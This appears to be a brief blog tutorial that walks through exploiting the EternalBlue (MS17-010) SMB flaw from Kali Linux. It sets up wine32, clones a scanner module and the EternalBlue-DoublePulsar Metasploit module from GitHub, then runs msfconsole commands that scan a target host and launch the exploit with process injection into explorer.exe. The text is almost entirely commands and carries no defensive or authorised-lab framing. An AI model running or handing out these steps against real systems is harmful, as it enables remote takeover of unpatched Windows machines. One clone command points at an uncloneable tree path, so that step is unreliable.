
The EternalBlue vulnerability

1. Upgrade kali-rolling
a. Edit the update sources with vim /etc/apt/sources.list: keep only the official source "deb http://http.kali.org/kali kali-rolling main non-free contrib" and comment out all other sources;

b. Update: apt-get update && apt-get upgrade

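2. Install wine32
root@kali:~ wine # reports that wine is not installed
dpkg --add-architecture i386
apt-get install wine32 && wine update
After installation, the /root/.wine directory is created.
3. Download the scanner module (smb_ms17_010.rb) and the exploit module (Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb)
Scanner module: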
git clone https://github.com/SwordWizard/metasploit-framework/tree/master/modules/auxiliary/scanner/smb/smb_ms17_010
Exploit module:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
Extract the exploit module and copy the deps folder and eternalblue_doublepulsar.rb to /root/.msf/modules/exploits/windows/smb; copy the scanner module smb_ms17_010.rb to /root/.msf/modules/auxiliary/scanner/smb/.
4. Start msf
msfconsole
msfupdate
5. Load and configure the scanner module
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS XXX.XXX.XXX.XXX
run
6. Load the exploit module
use exploits/windows/smb/eternalblue_doublepulsar
set RHOST XXX.XXX.XXX.XXX
set PROCESSINJECT explorer.exe
run